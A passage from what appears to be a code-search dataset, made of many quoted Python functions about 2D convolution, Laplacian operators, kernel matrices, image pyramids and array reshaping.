concatenate fuctions\n\tleft, right, up, down = x_min, x_max, y_min, y_max\n\tndarray = expand_img(ndarray, left, right, up, down)\n\n\tx_init, x_end = x_min, x_min + width\n\ty_init, y_end = y_min, y_min + height\n\t#loops for access to ndarrays\n\tfor x in range(x_init, x_end ):\n\t\tfor y in range(y_init, y_end ):\n\t\t\t#get the data of original image\n\t\t\tponderate_values = ndarray[(y - y_min):(y + y_max + 1) , # y range to indexed\n\t\t\t\t\t\t\t\t\t (x - x_min):(x + x_max) + 1] # x range to indexed\n\t\t\tponderate_values = ponderate_values.flatten()\n\n\t\t\t#get the dot product for the ponderate sum\n\t\t\tresult_ndarray[x - x_init, y - y_init] = np.dot(ponderate_values, flatten_kernel) \n\n\treturn result_ndarray", "def LEIsotropic2D(self):\n const = self.ymod / ((1+self.Nu) * (1-(2*self.Nu)))\n a = const * self.Nu\n b = const * (1-self.Nu)\n c = const * 0.5 * (1-2*self.Nu)\n Cmat = np.array(\n [\n [b, a, 0],\n [a, b, 0],\n [0, 0, c],\n ], dtype=float)\n stress_el = Cmat @ self.eps\n return stress_el, Cmat", "def get_l(GW_glitch,i,j):\n\t\t \n\ttemp = np.einsum('nmk,nmk->k', GW_glitch.r_outer_r[:,:,i,j,:], GW_glitch.Hij[:,:,i,j,:])\n\t\t \n\treturn temp", "def get_kernel(X1, X2, charges1, charges2, sigma=1, mode=\"local\"):\n\n if len(X1.shape) > 2:\n\n K = get_atomic_local_kernel(X1, X2, charges1, charges2, sigma)\n\n else:\n\n K = laplacian_kernel(X2, X1, sigma)\n\n return K", "def compute_kernel_matrix(x,y,sigma):\n m = len(x)\n\n s = np.zeros((m,m))\n for i in range(len(x)):\n for j in range(i+1):\n s[i,j] = np.exp(-((x[i]-y[j])**2)/(2*sigma**2))\n for i in range(2,m):\n for j in range(0,i):\n s[i,j] = s[j,i]\n return s", "def convolve2d(img, kernel):\n #Flip the kernel\n kernel = utils.flip2d(kernel) \n 
#print(len(kernel))\n \n c = copy.deepcopy(img)\n \n #print(len(c))\n #Padd the image\n pad = int((len(kernel)-1)/2)\n\n\n padded_img = utils.zero_pad(img,pad,pad)\n #print(len(padded_img), len(padded_img[0]))\n #print(len(kernel))\n #print(len(img)**2)\n og_img=[]\n#c = copy.deepcopy(img)\n j=0\n offset = 0\n for m in range(len(img) * len(img[0])): # size of kernel x kernel\n x = []\n \n for i in range(len(kernel)): #3 is kernel size\n #print(i,j)\n x.append(padded_img[i+offset][j:j+len(kernel)])\n #print((x))\n sum = 0\n for k in range(len(kernel)):\n for l in range(len(kernel[0])):\n sum+= x[k][l] * kernel[k][l]\n #print(i,j)\n #print(sum)\n og_img.append(sum) \n j+=1\n if (j == len(img[0])):\n j = 0\n offset+= 1\n \n #print(len(img), len(img[0]))\n final_img = []\n for i in range(0,(len(img)*len(img[0])),len(img[0])):\n final_img.append(og_img[i:i+len(img[0])])\n #print(len(final_img)), len(final_img[0])\n return final_img\n\n # TODO: implement this function.", "def conv2d(args):\n inp_ = args[0]\n kernel = args[1]\n stride = args[2]\n padding = args[3]\n (batch_size, in_channels, H, W) = inp_.shape\n (out_channels, in_channels_t, Hk, Wk) = kernel.shape\n Hc = int((H - Hk)/stride)+1\n Wc = int((W - Wk)/stride)+1\n conv_layer = np.zeros((batch_size, out_channels, Hc, Wc))\n for batch_i in range(batch_size):\n for o_chann_i in range(out_channels):\n for in_chann_i in range(in_channels):\n curr_ker = kernel[o_chann_i, in_chann_i, :, :]\n curr_inp = inp_[batch_i, in_chann_i, :, :]\n h_ind = 0\n while h_ind + Hk <= H:\n w_ind = 0\n while w_ind + Wk <= W:\n inp_patch = curr_inp[h_ind:h_ind+Hk, w_ind:w_ind+Wk]\n # Sum the conv_value of all the inp_channels\n conv_layer[batch_i, o_chann_i, h_ind//stride, w_ind//stride] += np.sum(inp_patch*curr_ker)\n w_ind+=stride\n h_ind+=stride\n return conv_layer", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def algi(C):\n return np.array([ C[0,2], C[1,2], C[1,0] ])", "def generate_two_dim_step_matrices(self):\n Lap_h = two_dim_sparse_neumann_laplacian(self.M, format='csc')\n I_m = sp.identity(self.M * self.M, dtype='float64', format='csc')\n\n I_minus_Lap = spla.factorized(I_m - (self.r / 2.0) * Lap_h)\n I_plus_Lap = I_m + (self.r / 2.0) * Lap_h\n\n return I_minus_Lap, I_plus_Lap", "def c_():\r\n c = np.array([[0, 0], [0, 100], [100, 100], [100, 80], [20, 80],\r\n [20, 20], [100, 20], [100, 0], [0, 0]])\r\n return c", "def alloc2d(x,y,iv=0):\n return [[iv for j in range(int(x))] for i in range(int(y))]", "def conv_2D(img,kernel,stride=1):\n\n m,n = img.shape\n r,c = kernel.shape\n\n kernel = np.flip(kernel,axis=1)\n kernel = np.flip(kernel,axis=0)\n\n c_m, c_n = int(np.ceil((m-r+1)/stride)), int(np.ceil((n-c+1)/stride))\n img_conv = np.zeros((c_m,c_n),dtype=float)\n\n for i,j in it.product(range(c_m),range(c_n)):\n img_conv[i,j] = (img[i*stride:i*stride+r,j*stride:j*stride+c] * kernel).sum()\n\n return img_conv", "def downsample2d(inputArray, kernelSize):\n average_kernel = np.ones((kernelSize,kernelSize))\n\n blurred_array = sig.convolve2d(inputArray, average_kernel, mode='same')\n downsampled_array = blurred_array[::kernelSize,::kernelSize]\n return downsampled_array", "def load_kernel_laplacian(self, file):\n fp = open(file, \"rb\")\n kernel_laplacian = pd.read_csv(fp, sep=',')\n return kernel_laplacian", "def make_2d(x):\n return x.reshape((1, len(x)))", "def _laplacian_pyramid(batch, num_levels):\n gaussian_filter = 
constant_op.constant(_GAUSSIAN_FILTER)\n\n def spatial_conv(batch, gain):\n s = array_ops.shape(batch)\n padded = array_ops.pad(batch, [[0, 0], [2, 2], [2, 2], [0, 0]], 'REFLECT')\n xt = array_ops.transpose(padded, [0, 3, 1, 2])\n xt = array_ops.reshape(xt, [s[0] * s[3], s[1] + 4, s[2] + 4, 1])\n conv_out = nn_ops.conv2d(xt, gaussian_filter * gain, [1] * 4, 'VALID')\n conv_xt = array_ops.reshape(conv_out, [s[0], s[3], s[1], s[2]])\n conv_xt = array_ops.transpose(conv_xt, [0, 2, 3, 1])\n return conv_xt\n\n def pyr_down(batch): # matches cv2.pyrDown()\n return spatial_conv(batch, 1)[:, ::2, ::2]\n\n def pyr_up(batch): # matches cv2.pyrUp()\n s = array_ops.shape(batch)\n zeros = array_ops.zeros([3 * s[0], s[1], s[2], s[3]])\n res = array_ops.concat([batch, zeros], 0)\n res = array_ops.batch_to_space(res, crops=[[0, 0], [0, 0]], block_size=2)\n res = spatial_conv(res, 4)\n return res\n\n pyramid = [math_ops.to_float(batch)]\n for _ in range(1, num_levels):\n pyramid.append(pyr_down(pyramid[-1]))\n pyramid[-2] -= pyr_up(pyramid[-1])\n return pyramid", "def to_2d_array(self):\n return reshape_fns.to_2d(self._obj, raw=True)", "def convolve(self, kernel):\n kernel_rows, kernel_cols = kernel.shape\n img_rows, img_cols = self.img_array.shape\n\n print(\"imgae shape: \", self.img_array.shape)\n print(self.img_array[:10,:10])\n\n # flip the kernel\n flipped_kernel = np.zeros(kernel.shape)\n \n ## column flips\n for i in range(flipped_kernel.shape[1]):\n flipped_kernel[:,i] = kernel[:,kernel_cols-i-1]\n kernel = flipped_kernel.copy()\n\n ## row flips\n for i in range(flipped_kernel.shape[0]):\n flipped_kernel[i,:] = kernel[kernel_rows-i-1,:]\n kernel = flipped_kernel.copy()\n print(\"Flipped kernel:\\n\", kernel)\n\n # Handle broders by padding the image with white pixels.\n ## padwidth = kernel_rows // 2 \n padwidth = kernel_rows // 2\n self.img_array_padded = np.pad(self.img_array, padwidth, \n mode='constant', constant_values=255)\n \n # cross correlation\n self.img_array_out = np.zeros(self.img_array.shape)\n\n for y in range(img_cols):\n for x in range(img_rows):\n self.img_array_out[x, y] = \\\n (kernel * self.img_array_padded[x:x+kernel_cols, y:y+kernel_rows]).sum()\n \n # print(self.img_array_out.shape)\n # print(self.img_array_out[:10,:10])\n return self.img_array_out", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def laplacianEdgeDetector(img):\n laplacian_kernel = np.array([[0,1,0],\\\n [1,-4,1],\\\n [0,1,0]])\n return convolve2d(img, laplacian_kernel, mode='same')", "def _kernel_F2(matrix_in) -> List[np.ndarray]: # pylint: disable=invalid-name\n size = matrix_in.shape\n kernel = []\n matrix_in_id = np.vstack((matrix_in, np.identity(size[1])))\n matrix_in_id_ech = (_row_echelon_F2(matrix_in_id.transpose())).transpose()\n\n for col in range(size[1]):\n if np.array_equal(\n matrix_in_id_ech[0 : size[0], col], np.zeros(size[0])\n ) and not np.array_equal(matrix_in_id_ech[size[0] :, col], np.zeros(size[1])):\n kernel.append(matrix_in_id_ech[size[0] :, col])\n\n return kernel", "def one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def sub_kernel(kernel, dim1, dim2):\n\n sub_kernel = kernel[dim1[0]:dim1[1],dim2[0]:dim2[1]]\n return sub_kernel", "def convolution(image: np.array, kernel: np.array) -> np.array:\n\n # default condition: apply SAME padding, and keep stride at 1\n stride_x = 1\n stride_y = 1\n padding_y = int(len(kernel - 1) / 2)\n 
padding_x = int(len((kernel[0]) - 1) / 2)\n # create the return array with with the same dimensions as <image>,\n # and then create a padded image\n convolved_image = np.zeros((len(image), len(image[0])))\n padded_image = np.zeros((len(image) + 2 * padding_y,\n len(image[0]) + 2 * padding_x))\n padded_image[padding_x: -padding_x, padding_y: -padding_y] = image\n\n for py in range(0, len(padded_image) - len(kernel), stride_y):\n for px in range(0, len(padded_image[0]) - len(kernel[0]), stride_x):\n # scan the matrix over columns in image array, then shift the matrix\n # down, and repeat\n padded_image_section = padded_image[py: py + len(kernel[0]),\n px: px + len(kernel)]\n # print(padded_image_section)\n convolved_image[py, px] = int(np.tensordot(padded_image_section,\n kernel))\n\n return convolved_image", "def getIntArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def reconstructFromLaplacianPyramid(pyramid):\n \n nLevels = len(pyramid)\n out = pyramid[-1]\n if len(pyramid) == 1:\n return out\n\n useStack = False\n if pyramid[0].shape[0:2] == pyramid[-1].shape[0:2]:\n useStack = True\n\n dtp = out.dtype\n for i in range(nLevels-2,-1,-1):\n newSz = pyramid[i].shape[0:2]\n if useStack:\n up = out\n else:\n up = cv2.pyrUp(out,dstsize=(newSz[1],newSz[0]))\n if len(up.shape) < 3:\n up.shape += (1,)\n out = up + pyramid[i]\n out = out.astype(dtp)\n\n return out", "def discreteConvolution2D( iImage, iKernel ): \n # pretvori vhodne spremenljivke v np polje in\n # inicializiraj izhodno np polje\n iImage = np.asarray( iImage )\n iKernel = np.asarray( iKernel )\n #------------------------------- za hitrost delovanja\n oImage = ni.convolve( iImage, iKernel, mode='nearest' ) \n return oImage", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def numpy_compute_kernel_matrices(x, x_star, sigma_f=1, l=1):\r\n start_time = time()\r\n\r\n\r\n xx, yy = np.meshgrid(x, x, sparse=True)\r\n xx_star2, yy_star2 = np.meshgrid(x_star, x_star, sparse=True)\r\n xx_star, yy_star = np.meshgrid(x, x_star, sparse=True)\r\n\r\n K = kernel_function_1D(xx, yy, sigma_f, l)\r\n K_star2 = kernel_function_1D(xx_star2, yy_star2, sigma_f, l)\r\n K_star = kernel_function_1D(xx_star, yy_star, sigma_f, l)\r\n\r\n print(\"--- %s ---\" % seconds_to_str((time() - start_time)))\r\n\r\n return (K, K_star2, K_star)", "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def kernel_temp(self, x):\n x = np.atleast_2d(x)\n n, d = x.shape\n\n # Vectorized implementation\n kxx = self.kernel(x, x) # (n, n)\n assert_shape(kxx, (n, n))\n\n k_xx = np.zeros((n, n, d))\n k_x_x = np.zeros((n, n, d))\n\n for l in xrange(d):\n if l % 100 == 0:\n print \"\\tkxx, k_xx, k_x_x: l = %d ...\" % l\n\n neg_l_x = self.neg_inv(x, l)\n k_xx[:, :, l] = self.kernel(neg_l_x, x)\n k_x_x[:, :, l] = self.kernel(neg_l_x, neg_l_x)\n\n return [kxx, k_xx, k_x_x]", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def cartesian2bary(self, x):\n lam = np.zeros((x.shape[0], 3))\n lam[:,:2] = np.einsum('ij,kj->ki', self.Tinv, x - self.xv[2])\n lam[:,2] = 1. 
- lam[:,0] - lam[:,1]\n return lam", "def linear_kernel_pure(X, Y=None):\n X, Y = _check_pairwise_arrays(X, Y)\n return dot_2d(X, Y)", "def lap2D(self, lat):\n lap = np.roll(lat, 1, 0) + np.roll(lat, -1, 0) + \\\n np.roll(lat, 1, 1) + np.roll(lat, -1, 1) - \\\n 4. * lat\n lap = 1./self.dx**2. * lap\n # print(lap[50][50])\n return(lap)", "def convolve_2d(image: xr.DataArray,\n kernel,\n pad=True,\n use_cuda=True) -> xr.DataArray:\n # Don't allow padding on (1, 1) kernel\n if (kernel.shape[0] == 1 and kernel.shape[1] == 1):\n pad = False\n\n if pad:\n pad_rows = kernel.shape[0] // 2\n pad_cols = kernel.shape[1] // 2\n pad_width = ((pad_rows, pad_rows),\n (pad_cols, pad_cols))\n else:\n # If padding is not desired, set pads to 0\n pad_rows = 0\n pad_cols = 0\n pad_width = 0\n\n padded_image = np.pad(image, pad_width=pad_width, mode=\"reflect\")\n result = np.empty_like(padded_image)\n\n if has_cuda() and use_cuda:\n griddim, blockdim = cuda_args(padded_image.shape)\n _convolve_2d_cuda[griddim, blockdim](result, kernel, padded_image)\n else:\n result = _convolve_2d(kernel, padded_image)\n\n if pad:\n result = result[pad_rows:-pad_rows, pad_cols:-pad_cols]\n\n if result.shape != image.shape:\n raise ValueError(\"Output and input rasters are not the same shape.\")\n\n return result", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def kde_2d_multiple_times(plume_x, plume_y, X, Y):\n Z = []\n positions = np.vstack([X.ravel(), Y.ravel()])\n for i in range(len(plume_x)):\n values = np.vstack([plume_x[i], plume_y[i]])\n kernel = stats.gaussian_kde(values)\n Z.append(np.reshape(kernel(positions).T, X.shape))\n return Z", "def get_kernel_matrix(self):\n with self.get_lock().read_lock():\n return self._kernel", "def l2_square_from_inner_product(matrix):\n return np.diag(matrix)", "def sharp_laplace2(img):\n\n # the laplacian kernel\n laplace_kern = np.array([[-1., -1., -1.],\n [-1., 0., -1.],\n [-1., -1., -1.]])\n\n # See laplace 1 above for the following lines\n img = np.asarray(img, dtype=np.int)\n sharp = img + ndi.convolve(img, laplace_kern)\n\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def nodalLaplacian(self):\n if getattr(self, '_nodalLaplacian', None) is None:\n print('Warning: Laplacian has not been tested rigorously.')\n # The number of cell centers in each direction\n n = self.vnC\n # Compute divergence operator on faces\n if(self.dim == 1):\n D1 = sdiag(1./self.hx) * ddx(self.nCx)\n L = - D1.T*D1\n elif(self.dim == 2):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n L1 = sp.kron(speye(n[1]+1), - D1.T * D1)\n L2 = sp.kron(- D2.T * D2, speye(n[0]+1))\n L = L1 + L2\n elif(self.dim == 3):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n D3 = sdiag(1./self.hz) * ddx(n[2])\n L1 = kron3(speye(n[2]+1), speye(n[1]+1), - D1.T * D1)\n L2 = kron3(speye(n[2]+1), - D2.T * D2, speye(n[0]+1))\n L3 = kron3(- D3.T * D3, speye(n[1]+1), speye(n[0]+1))\n L = L1 + L2 + L3\n self._nodalLaplacian = L\n return self._nodalLaplacian", "def blockshaped(input_suduko_2d):\n h = input_suduko_2d.shape[0]\n return (input_suduko_2d.reshape(h // 3, 3, -1, 3)\n .swapaxes(1, 2)\n .reshape(-1, 3, 3))", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, 
dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def _make_2x2(self, A11, A12, A21, A22, dtype=float):\n array = np.empty((2,2), dtype=dtype)\n array[0,0] = A11\n array[0,1] = A12\n array[1,0] = A21\n array[1,1] = A22\n return array", "def mult_L(self) -> np.ndarray:\n return np.array([\n [self.w, -self.x, -self.y, -self.z],\n [self.x, self.w, -self.z, self.y],\n [self.y, self.z, self.w, -self.x],\n [self.z, -self.y, self.x, self.w]])", "def conv2d(\n input: np.ndarray,\n weight: np.ndarray,\n bias: np.ndarray = None,\n stride: int = 1,\n padding: int = 0,\n groups: int = 1,\n dilation: int = 0,\n) -> np.ndarray:\n if input.ndim == 3:\n input = np.expand_dims(input, axis=0)\n assert dilation == 0, \"dilation > 0 not supported yet.\"\n assert input.ndim == weight.ndim\n assert weight.shape[1] * groups == input.shape[1]\n if bias is None:\n bias = np.zeros((weight.shape[0],))\n assert weight.shape[0] == bias.shape[0]\n assert weight.shape[2] == weight.shape[3], \"non-equal kernel size not supported\"\n C_out, _, K, _ = weight.shape\n padded_input = np.pad(\n input, ((0, 0), (0, 0), (padding, padding), (padding, padding)), constant_values=0.0\n )\n N, C_in, H, W = padded_input.shape\n C_in_grp = C_in // groups # C_in group size\n C_out_grp = C_out // groups # C_out group size\n out = []\n for g in range(groups):\n input_g = padded_input[:, g * C_in_grp : (g + 1) * C_in_grp]\n weight_g = weight[g * C_out_grp : (g + 1) * C_out_grp, ...]\n bias_g = bias[g * C_out_grp : (g + 1) * C_out_grp]\n out_g = np.zeros((N, C_out_grp, (H - K + 1) // stride, (W - K + 1) // stride))\n for i in range((H - K + 1) // stride):\n for j in range((W - K + 1) // stride):\n si, sj = stride * i, stride * j\n input_block = input_g[:, None, :, si : si + K, sj : sj + K]\n out_g[:, :, i, j] = (input_block * weight_g).reshape(N, C_out_grp, -1).sum(\n axis=2\n ) + bias_g[None, :]\n out.append(out_g)\n return np.concatenate(out, axis=1)", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def conv2d_v2(input, # pylint: disable=redefined-builtin\n filters,\n strides,\n padding,\n data_format=\"NHWC\",\n dilations=None,\n name=None):\n # pylint: disable=line-too-long\n # pylint: enable=line-too-long\n return conv2d(input, # pylint: disable=redefined-builtin\n filters,\n strides,\n padding,\n use_cudnn_on_gpu=True,\n data_format=data_format,\n dilations=dilations,\n name=name)", "def filter2D(img, kernel = (5,5)):\n\ttmp = img.copy()\n\tk = np.ones((kernel[0], kernel[1]), np.float32) / (kernel[0]*kernel[1])\n\tdst = cv2.filter2D(tmp, -1, k)\n\treturn dst", "def _minmaxkernel_numpy(data_1, data_2):\n return np.stack([(np.minimum(data_1, data_2[cpd,:]).sum(axis=1) / np.maximum(data_1, data_2[cpd,:]).sum(axis=1)) for cpd in range(data_2.shape[0])],axis=1)", "def GetKernel(self) -> \"itkFlatStructuringElement2 const &\":\n return _itkClosingByReconstructionImageFilterPython.itkClosingByReconstructionImageFilterIUS2IUS2SE2_GetKernel(self)", "def image_batch():\n return np.zeros((2, 1, 4, 4))", "def get_kernel_norms(self):\n return np.einsum('ijk->ij', self.amplitudes)", "def nd_kernel(n):\n n = int(n)\n total_size = 3**n\n mid_point = int((3**n - 1)/2)\n kern = np.zeros(total_size, dtype=bool)\n for i in range(n):\n kern[mid_point-3**i] = True\n kern[mid_point+3**i] = True\n new_shape = 3*np.ones(n, dtype=int) \n unnormed_kern = kern.reshape(new_shape)\n return 
unnormed_kern/unnormed_kern.sum()", "def conv_nested(image, kernel):\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n out = np.zeros((Hi, Wi))\n\n H = Hk // 2\n W = Wk // 2\n for i1 in range(Hi):\n for j1 in range(Wi):\n for i2 in range(Hk):\n for j2 in range(Wk):\n i = i2 - H\n j = j2 - W\n if i1-i<0 or j1-j<0 or i1-i>=Hi or j1-j>=Wi:\n continue\n out[i1, j1] += kernel[i2, j2]*image[i1-i, j1-j]\n return out", "def getNormLaplacian(W):\n\td=[np.sum(row) for row in W]\n\tD=np.diag(d)\n\tL=D-W\n\t#Dn=D^(-1/2)\n\tDn=np.power(np.linalg.matrix_power(D,-1),0.5)\n\tLbar=np.dot(np.dot(Dn,L),Dn)\n\treturn Lbar", "def binary_opening2d(value, kernel, stride=1, padding=\"SAME\"):\n out = binary_erosion2d(value, kernel, stride, padding)\n out = binary_dilation2d(out, kernel, stride, padding)\n return out", "def _build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = _gaussian_kernel_1d(filter_size).reshape(filter_size, 1)\n pyr = []\n im_curr = im\n im_next = _reduce(im, filter_vec)\n while _image_is_large_enough(im_next) and len(pyr) < max_levels - 1:\n pyr.append(im_curr - _expand(im_next, filter_vec))\n im_curr = im_next\n im_next = _reduce(im_curr, filter_vec)\n\n pyr.append(im_curr)\n\n return pyr, filter_vec.reshape(1, filter_size)", "def kernel(self):\n\n # Create a blank kernel the appropriate size\n kernel = np.zeros((self.n_rows, self.n_cols), dtype=np.int)\n\n # Iterate through the offsets, turning on the correct pixels\n for offset in self.offsets:\n row, col = offset\n if np.all(offset == self.index):\n kernel[row, col] = 2\n else:\n kernel[row, col] = 1\n\n # Ensure that the index pixel is not zero for footprints where the\n # index pixel is not part of the footprint\n if kernel[self.index[0], self.index[1]] == 0:\n kernel[self.index[0], self.index[1]] = 3\n return kernel", "def _e_2d_(p, a):\r\n diff = a - p[np.newaxis, :]\r\n return np.einsum('ij,ij->i', diff, diff)", "def conv_matrix(matrix, kernel):", "def even_kernel(mu, N):\n\n # Check that -1 <= mu <= 1\n mu = np.clip(mu, -1, 1)\n\n # Need Legendre polynomials\n legPolys = legp(mu, N)\n \n\n coefs = 2*np.arange(0, N+1) + 1\n \n ker = coefs[0::2]*legPolys[0::2] \n\n return ker.sum() / (4.0*np.pi)", "def create_kernel(shape):\n indices = np.array(list(itertools.product([-1, 0],\n repeat=len(shape))))\n ref = np.sum(indices[0]) & 1\n parity = np.array([1 if (-sum(i) & 1) == ref else -1 for i in indices])\n indices = tuple([indices[:, i] for i in range(indices.shape[1])])\n kernel = np.zeros(shape, dtype=np.float32)\n kernel[indices] = parity\n return kernel", "def ikle2(self):\n if self._ikle2 is None:\n if self.nplan > 1:\n self._ikle2 = np.compress(np.repeat([True, False], self.ndp2),\n self.ikle3[0:self.nelem2], axis=1)\n else:\n self._ikle2 = self.ikle3\n\n return self._ikle2", "def curvature_matrix_diag(self) -> np.ndarray:\r\n\r\n if self.settings.use_w_tilde_numpy:\r\n return inversion_util.curvature_matrix_via_w_tilde_from(\r\n w_tilde=self.w_tilde.w_matrix, mapping_matrix=self.mapping_matrix\r\n )\r\n\r\n from autoarray.inversion.inversion import inversion_util_secret\r\n\r\n mapper = self.cls_list_from(cls=AbstractMapper)[0]\r\n\r\n if not self.settings.use_source_loop:\r\n return inversion_util_secret.curvature_matrix_via_w_tilde_curvature_preload_interferometer_from(\r\n curvature_preload=self.w_tilde.curvature_preload,\r\n pix_indexes_for_sub_slim_index=mapper.pix_indexes_for_sub_slim_index,\r\n pix_size_for_sub_slim_index=mapper.pix_sizes_for_sub_slim_index,\r\n 
pix_weights_for_sub_slim_index=mapper.pix_weights_for_sub_slim_index,\r\n native_index_for_slim_index=self.transformer.real_space_mask.derive_indexes.native_for_slim,\r\n pix_pixels=self.linear_obj_list[0].params,\r\n )\r\n\r\n (\r\n sub_slim_indexes_for_pix_index,\r\n sub_slim_sizes_for_pix_index,\r\n sub_slim_weights_for_pix_index,\r\n ) = mapper.sub_slim_indexes_for_pix_index_arr\r\n\r\n return inversion_util_secret.curvature_matrix_via_w_tilde_curvature_preload_interferometer_from_2(\r\n curvature_preload=self.w_tilde.curvature_preload,\r\n native_index_for_slim_index=self.transformer.real_space_mask.derive_indexes.native_for_slim,\r\n pix_pixels=self.linear_obj_list[0].params,\r\n sub_slim_indexes_for_pix_index=sub_slim_indexes_for_pix_index.astype(\"int\"),\r\n sub_slim_sizes_for_pix_index=sub_slim_sizes_for_pix_index.astype(\"int\"),\r\n sub_slim_weights_for_pix_index=sub_slim_weights_for_pix_index,\r\n )", "def C2D(self, temperature: float = None) -> ArrayLike:\n t = temperature\n n1 = self.nu(t) / (1 - self.nu(t))\n n2 = (1 - 2 * self.nu(t)) / (2 * (1 - self.nu(t)))\n\n C = np.array([[ 1, n1, 0],\n [n1, 1, 0],\n [ 0, 0, n2]], dtype=float)\n C *= self.E(t) * (1 - self.nu(t)) / ((1 + self.nu(t)) * (1 - 2 * self.nu(t)))\n return C", "def l2(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n\n return (u - v) ** 2", "def convolve_spikes(spikes,kernel):\n output = np.zeros((spikes.shape[0]+kernel.shape[0]+1,kernel.shape[1]))\n for i in np.where(spikes)[0]:\n output[(i+1):(i+1+kernel.shape[0]),:] = output[(i+1):(i+1+kernel.shape[0]),:] + kernel\n return output[:len(spikes),:]", "def vvc_filters_2d(kernel_size):\n vvc_filters = []\n half_kernel = (kernel_size - 8) // 2\n for frac_pos in frac_positions():\n filter_x = filter_coefficients(int(frac_pos.split(\",\")[0]))\n filter_y = filter_coefficients(int(frac_pos.split(\",\")[1]))\n\n filter_vvc = np.tile(filter_x, 8).reshape((8, 8))\n for index in range(len(filter_y)):\n filter_vvc[index, :] *= filter_y[index]\n filter_vvc = filter_vvc / (64 * 64)\n\n vvc_filters.append(np.pad(filter_vvc, ((half_kernel + 1, half_kernel), (half_kernel + 1, half_kernel)),\n 'constant', constant_values=0))\n return vvc_filters", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def deconvolve2d(x, y, stride=1, pad=0, shape=None):\n deconv = Deconvolve2dFunction(y.shape[:2], y.shape[2], stride, pad, shape)\n return deconv.forward(x, y.reshape(-1, y.shape[-1]))", "def kernel_diff2_tr(self, x, kernel_res):\n x = np.atleast_2d(x)\n\n n = x.shape[0]\n d = x.shape[1]\n\n kxx, k_xx, k_x_x = kernel_res\n\n assert_shape(kxx, (n, n))\n assert_shape(k_xx, (n, n, d))\n assert_shape(k_x_x, (n, n, d))\n\n k_xx_tr = np.sum(k_xx, axis=-1)\n k_x_x_tr = np.sum(k_x_x, axis=-1)\n\n res = kxx*d - k_xx_tr - k_xx_tr.T + k_x_x_tr # (n, n)\n\n return res", "def _get_n2(self) -> np.ndarray:\n n2_disp1d = np.arange(-self.N + 1, self.N + 1) ** 2\n\n n2 = np.sum(\n [el.flatten() for el in np.meshgrid(*[n2_disp1d] * self._ndim)], axis=0\n )\n if self.spherical:\n n2 = np.array([el for el in n2 if el < self.N ** 2])\n return n2", "def conv(image, kernel):\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n out = np.zeros((Hi, Wi))\n\n # For this assignment, we will use edge values to 
pad the images.\n # Zero padding will make derivatives at the image boundary very big,\n # whereas we want to ignore the edges at the boundary.\n pad_width0 = Hk // 2\n pad_width1 = Wk // 2\n pad_width = ((pad_width0,pad_width0),(pad_width1,pad_width1))\n padded = np.pad(image, pad_width, mode='edge')\n\n ### YOUR CODE HERE\n for i in range(Hi):\n for j in range(Wi):\n out[i,j] = np.sum(padded[i : i + Hk, j : j + Wk] * np.flip(kernel))\n ### END YOUR CODE\n\n return out", "def init_two_d_array(dimens, val):\n w, x = dimens\n return [[val for j in range(x)] for i in range(w)]", "def one_dim(a: cython.double[:]):\n a[0] *= 2\n return a[0], a.ndim", "def even_kernel_der(mu, N):\n\n # Check that -1 <= mu <= 1\n mu = np.clip(mu, -1, 1)\n\n #Derivatives of Legendre polynomials\n DlegPolys = legp_der(mu, N)\n \n coefs = 2*np.arange(0, N+1) + 1\n \n ker = coefs[0::2]*DlegPolys[0::2] \n\n return ker.sum() / (4.0*np.pi)", "def getDoubleArray2D(self) -> typing.List[typing.List[float]]:\n ...", "def _compute_spatial_gradient_kernel(ndim=1):\n\n # 1D differential element\n dq = np.array([-1., 1.]) / 2.\n\n # replicate dq ndim times\n while len(dq.shape) != ndim:\n dq = np.array([dq, ] * ndim)\n\n # return gradient kernel\n return np.array([dq.swapaxes(ndim - 1 - q, -1)\n for q in xrange(ndim)])", "def pool2d(_w_in, k, *, stride=1):\n assert k % 2 == 1, \"Only odd size kernels supported to avoid padding issues.\"\n return nn.MaxPool2d(k, stride=stride, padding=(k - 1) // 2)", "def 